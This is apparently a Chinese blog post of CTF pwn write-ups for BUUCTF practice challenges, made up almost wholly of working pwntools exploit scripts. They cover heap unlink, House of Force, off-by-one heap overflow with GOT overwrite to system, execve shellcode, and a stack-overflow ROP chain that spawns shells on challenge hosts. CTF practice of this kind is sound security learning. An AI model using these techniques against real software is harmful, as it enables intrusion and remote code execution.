PWN-PRACTICE-BUUCTF-19

最新推荐文章于 2024-01-31 14:40:58 发布

P1umH0

最新推荐文章于 2024-01-31 14:40:58 发布

阅读量139

点赞数

分类专栏： Pwn-BUUCTF 文章标签：安全系统安全

本文链接：https://blog.csdn.net/weixin_45582916/article/details/120154726

版权

Pwn-BUUCTF 专栏收录该内容

30 篇文章 4 订阅

订阅专栏

PWN-PRACTICE-BUUCTF-19

hitcontraining_bamboobox

unlink，参考：hitcontraining_bamboobox 堆技巧 unlink

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./bamboobox")
io=remote("node4.buuoj.cn",29339)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")

def show():
	io.sendlineafter("Your choice:","1")	
def add(name_len,name):
	io.sendlineafter("Your choice:","2")
	io.sendlineafter("the length of item name:",str(name_len))
	io.sendlineafter("the name of item:",name)
def edit(index,name_len,name):
	io.sendlineafter("Your choice:","3")
	io.sendlineafter("the index of item:",str(index))
	io.sendlineafter("the length of item name:",str(name_len))
	io.sendlineafter("the new name of the item:",name)
def free(index):
	io.sendlineafter("Your choice:","4")
	io.sendlineafter("the index of item:",str(index))
def exit():
	io.sendlineafter("Your choice:","5")

#gdb.attach(io)
#pause()

add(0x40,"aaaa")
add(0x80,"bbbb")
add(0x80,"cccc")

#pause()

ptr=0x00000000006020C8
fd=ptr-0x18
bk=ptr-0x10
payload=p64(0)+p64(0x40)+p64(fd)+p64(bk)
payload=payload.ljust(0x40,"A")
payload+=p64(0x40)+p64(0x90)
edit(0,len(payload),payload)

#pause()

free(1)

#pause()

atoi_got=elf.got["atoi"]
payload=p64(0)*2+p64(0x40)+p64(atoi_got)
edit(0,len(payload),payload)

#pause()

show()
io.recvuntil("0 : ")
atoi_addr=u64(io.recv(6).ljust(8,"\x00"))
print("atoi_addr=="+hex(atoi_addr))
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]

#pause()

edit(0,0x08,p64(system))

#pause()

io.sendlineafter("Your choice:","/bin/sh\x00")

io.interactive()

House of Force，参考：hitcontraining_bamboobox 堆技巧 House of Force

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
io=process("./bamboobox")
#io=remote("node4.buuoj.cn",26168)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")

def show():
	io.sendlineafter("Your choice:","1")	
def add(name_len,name):
	io.sendlineafter("Your choice:","2")
	io.sendlineafter("the length of item name:",str(name_len))
	io.sendlineafter("the name of item:",name)
def edit(index,name_len,name):
	io.sendlineafter("Your choice:","3")
	io.sendlineafter("the index of item:",str(index))
	io.sendlineafter("the length of item name:",str(name_len))
	io.sendlineafter("the new name of the item:",name)
def free(index):
	io.sendlineafter("Your choice:","4")
	io.sendlineafter("the index of item:",str(index))
def exit():
	io.sendlineafter("Your choice:","5")

#gdb.attach(io)
#pause()

add(0x30,"aaaa")
payload="a"*0x30+p64(0)+p64(0xffffffffffffffff)
edit(0,len(payload),payload)

#pause()

offset=0x000-0x060-0x10
add(offset,"bbbb")#移动top chunk

#pause()

magic=0x0000000000400D49
add(0x10,p64(magic)*2)

#pause()

exit()

#pause()

io.interactive()

picoctf_2018_shellcode

32位elf，静态编译，保护几乎全都没开
main函数中有条call eax的gadget，eax保存的是输入的起始地址，于是输入shellcode即可执行

from pwn import *
#io=process('./PicoCTF_2018_shellcode')
io=remote('node4.buuoj.cn',27908)
elf=ELF('PicoCTF_2018_shellcode')
io.recvuntil('Enter a string!\n')
shellcode=asm('xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f ;mov ebx,esp;mov eax,0xb;int 0x80')
io.sendline(shellcode)
io.interactive()

npuctf_2020_easyheap

obo，参考：npuctf_2020_easyheap

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./npuctf_2020_easyheap")
io=remote("node4.buuoj.cn",25100)
elf=ELF("./npuctf_2020_easyheap")
libc=ELF("./libc-2.27-18-x64.so")

def add(size,content):
	io.sendlineafter("Your choice :","1")
	io.sendlineafter("Size of Heap(0x10 or 0x20 only) : ",str(size))
	io.sendlineafter("Content:",content)
def edit(index,content):
	io.sendlineafter("Your choice :","2")
	io.sendlineafter("Index :",str(index))
	io.sendlineafter("Content: ",content)
def show(index):
	io.sendlineafter("Your choice :","3")
	io.sendlineafter("Index :",str(index))
def free(index):
	io.sendlineafter("Your choice :","4")
	io.sendlineafter("Index :",str(index))
def exit():
	io.sendlineafter("Your choice :","5")

#gdb.attach(io)
#pause()

add(0x18,"aaaa")#0
add(0x18,"bbbb")#1
add(0x18,"/bin/sh\x00")#2

#pause()

payload="a"*0x18+p64(0x41)
edit(0,payload)

#pause()

free(1)

#pause()

payload="a"*0x10+p64(0)+p64(0x21)+p64(8)+p64(elf.got["free"])
add(0x38,payload)

#pause()

show(1)
io.recvuntil("Content : ")
free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00"))
print("free_addr=="+hex(free_addr))
libc_base=free_addr-libc.sym["free"]
system=libc_base+libc.sym["system"]
print("system=="+hex(system))

#pause()

edit(1,p64(system))
free(2)

#pause()

io.interactive()

cmcc_pwnme2

栈溢出

from pwn import *
#io=process('./cmcc_pwnme2')
io=remote('node4.buuoj.cn',29405)
elf=ELF('./cmcc_pwnme2')
gets_plt=elf.plt['gets']
string_addr=0x0804A060
exec_str=0x080485CB
io.recvuntil('Please input:\n')
payload='a'*(0x6c+4)+p32(gets_plt)+p32(exec_str)+p32(string_addr)
io.sendline(payload)
io.sendline('./flag')
io.interactive()